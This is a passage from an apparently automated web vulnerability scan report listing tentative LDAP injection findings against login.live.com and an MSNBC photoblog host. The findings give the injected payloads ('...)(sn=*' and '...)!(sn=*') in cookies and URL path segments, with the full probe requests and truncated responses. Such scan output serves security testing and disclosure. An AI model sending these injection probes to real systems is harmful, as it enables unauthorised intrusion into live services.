<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="MisterGoodcat" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/MisterGoodcat.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>


...[SNIP]...

2.9. http://login.live.com/login.srf [MUID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://login.live.com
Path:   /login.srf

Issue detail

The MUID cookie appears to be vulnerable to LDAP injection attacks.

The payloads 6d0cc50644fe129b)(sn=* and 6d0cc50644fe129b)!(sn=* were each submitted in the MUID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=6d0cc50644fe129b)(sn=*; wla42=;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:49:13 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H41 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:48:13 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344953&id=64855&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-034b40c0-ec4a-47dc-9c86-914ce0846e13; path=/;version=1
X-Frame-Options: deny
Content-Length: 13617

<!-- ServerInfo: BAYIDSLGN1H41 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
ail.live.com/default.aspx";var srf_uSSL='https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=85753670';var srf_uReg="https://signup.live.com/signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=1296344953&cru=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26lc%3d1033%26id%3d64855%26mkt%3den-us";var srf_uFedConv="https://security.live.com/LoginStage.aspx?lmif=1000&ru=http://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1253879194%26rver%3D6.0.5285.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3D64855%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855";var srf_uPwRst="https://login.live.com/resetpw.srf?wreply=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1253879194%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26vv%3d900%26mkt%3dEN-US%26lc%3d1033&id=64855&mkt=EN-US&lc=1033";var srf_uAbout="http://login.live.com/gls.srf?urlID=WLAbout&mkt=EN-US&vv=900";var srf_uPrivacy="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=EN-US&vv=900";var srf_uHelp="http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=EN-US&vv=900";var srf_uFeedback="http://login.live.com/gls.srf?urlID=WLFeedback&mkt=EN-US&vv=900";var srf_uTerms="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&vv=900";var srf_uLinkDisclaimer="";var srf_uPinRst="javascript:DoHelp(\'sdarc_tarms_tuoba\',\'\',\'1033\',\'DH_MSN,1033\',\'\',\'900\',\'&format=b1\');";var srf_uLogin = 
"http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&vv=900&mkt=EN-US&lc=1033";var srf_uRDScript='http://Js.wlxrs.com/~Live.S
...[SNIP]...

Request 2

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=6d0cc50644fe129b)!(sn=*; wla42=;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:49:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H47 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:48:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344954&id=64855&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-9bd7d19f-73fe-4c55-955c-3a0205c96b76; path=/;version=1
X-Frame-Options: deny
Content-Length: 13602

<!-- ServerInfo: BAYIDSLGN1H47 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
ail.live.com/default.aspx";var srf_uSSL='https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=85754168';var srf_uReg="https://signup.live.com/signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=1296344954&cru=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26lc%3d1033%26id%3d64855%26mkt%3den-us";var srf_uFedConv="https://security.live.com/LoginStage.aspx?lmif=1000&ru=http://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1253879194%26rver%3D6.0.5285.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3D64855%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855";var srf_uPwRst="https://login.live.com/resetpw.srf?wreply=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1253879194%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26vv%3d900%26mkt%3dEN-US%26lc%3d1033&id=64855&mkt=EN-US&lc=1033";var srf_uAbout="http://login.live.com/gls.srf?urlID=WLAbout&mkt=EN-US&vv=900";var srf_uPrivacy="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=EN-US&vv=900";var srf_uHelp="http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=EN-US&vv=900";var srf_uFeedback="http://login.live.com/gls.srf?urlID=WLFeedback&mkt=EN-US&vv=900";var srf_uTerms="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&vv=900";var srf_uLinkDisclaimer="";var srf_uPinRst="javascript:DoHelp(\'sdarc_tarms_tuoba\',\'\',\'1033\',\'DH_MSN,1033\',\'\',\'900\',\'&format=b1\');";var srf_uLogin = 
"http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&vv=900&mkt=EN-US&lc=1033";var srf_uRDScript='http://Js.wlxrs.com/~Live.S
...[SNIP]...

2.10. https://login.live.com/ppsecure/secure.srf [wla42 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The wla42 cookie appears to be vulnerable to LDAP injection attacks.

The payloads d0b6de928a1638d)(sn=* and d0b6de928a1638d)!(sn=* were each submitted in the wla42 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296343067 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=d0b6de928a1638d)(sn=*;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:34:02 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1I49 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:33:02 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344042&id=265631&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-2f091b46-7c65-4a52-bf38-2a5801acd6e1; path=/;version=1
X-Frame-Options: deny
Content-Length: 17632

<!-- ServerInfo: BAYIDSLGN1I49 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
et%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&wlsu=1&ru=https://login.silverlight.net/login/createuser.aspx%3freturnurl%3dhttp://www.silverlight.net/showcase/default.aspx&bk=1296344042&lm=I';var srf_uStUsr="https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296344042";var g_urlNoCookies="https://login.live.com/cookiesDisabled.srf?mkt=EN-US&lc=1033";var srf_iForcedCT=0;var srf_sPhoneCodes = 'AR~Argentina~54~^[1-9]{1}[0-9]{10}$~9 343 555 1212~=1, =4, =7!!!AU~Australia~61~^[1-9]{1}[0-9]{8}$~499 123 456~=3, =6!!!BR~Brazil~55~^[1-9]{1}[0-9]{8,9}$~(11) 2345-6789~(=0,) =2,-=6!!!CA~Canada~1~^[1-9]{1}[0-9]{9}$~(604) 555-0100~(=0,) =3,-=6!!!CN~China~86~^1(3[0-9]{9}|[0-9]{10})$~136-8151-8185~-=3,-=7!!!CO~Colombia~57~^([1-9]{1}([0-9]{7}|[0-9]{9})|1[0-9]{10})$~3 315 012345~=1, =4!!!FR~France~33~^[1-9]{1}[0-9]{5,11}$~4 17 91 23 45 67~=1, =3, =5, =7, =9!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, 
=6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-9]{1}[0-9]{9}$~5XX 123 4567~=3, =6!!!UK~Uni
...[SNIP]...

Request 2

GET /ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296343067 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=d0b6de928a1638d)!(sn=*;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:34:03 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1I56 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:33:03 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344043&id=265631&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-9ee37e4c-9b69-4e79-8f50-abc402e8ee8a; path=/;version=1
X-Frame-Options: deny
Content-Length: 17622

<!-- ServerInfo: BAYIDSLGN1I56 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
et%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&wlsu=1&ru=https://login.silverlight.net/login/createuser.aspx%3freturnurl%3dhttp://www.silverlight.net/showcase/default.aspx&bk=1296344043&lm=I';var srf_uStUsr="https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296344043";var g_urlNoCookies="https://login.live.com/cookiesDisabled.srf?mkt=EN-US&lc=1033";var srf_iForcedCT=0;var srf_sPhoneCodes = 'AR~Argentina~54~^[1-9]{1}[0-9]{10}$~9 343 555 1212~=1, =4, =7!!!AU~Australia~61~^[1-9]{1}[0-9]{8}$~499 123 456~=3, =6!!!BR~Brazil~55~^[1-9]{1}[0-9]{8,9}$~(11) 2345-6789~(=0,) =2,-=6!!!CA~Canada~1~^[1-9]{1}[0-9]{9}$~(604) 555-0100~(=0,) =3,-=6!!!CN~China~86~^1(3[0-9]{9}|[0-9]{10})$~136-8151-8185~-=3,-=7!!!CO~Colombia~57~^([1-9]{1}([0-9]{7}|[0-9]{9})|1[0-9]{10})$~3 315 012345~=1, =4!!!FR~France~33~^[1-9]{1}[0-9]{5,11}$~4 17 91 23 45 67~=1, =3, =5, =7, =9!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, 
=6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-9]{1}[0-9]{9}$~5XX 123 4567~=3, =6!!!UK~Uni
...[SNIP]...

2.11. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://photoblog.msnbc.redacted
Path:   /_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads ad5b7d32bfbc5f43)(sn=* and ad5b7d32bfbc5f43)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:51:17 GMT
Content-Length: 28340
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1476088023&amp;do=msnbc.redacted&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=1476088023&amp;do=msnbc.redacted&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="htt
...[SNIP]...

Request 2

GET /_news/2011/01/ad5b7d32bfbc5f43)!(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:51:17 GMT
Content-Length: 28330
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=885699561&amp;do=msnbc.redacted&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=martinblog&amp;rand=885699561&amp;do=msnbc.redacted&amp;ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&amp;from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers &amp; Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="http:
...[SNIP]...

2.12. http://photoblog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://photoblog.msnbc.redacted
Path:   /_static/feeds/3147.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_static/feeds/*)(sn=* HTTP/1.1
Host: photoblog.msnbc.redacted
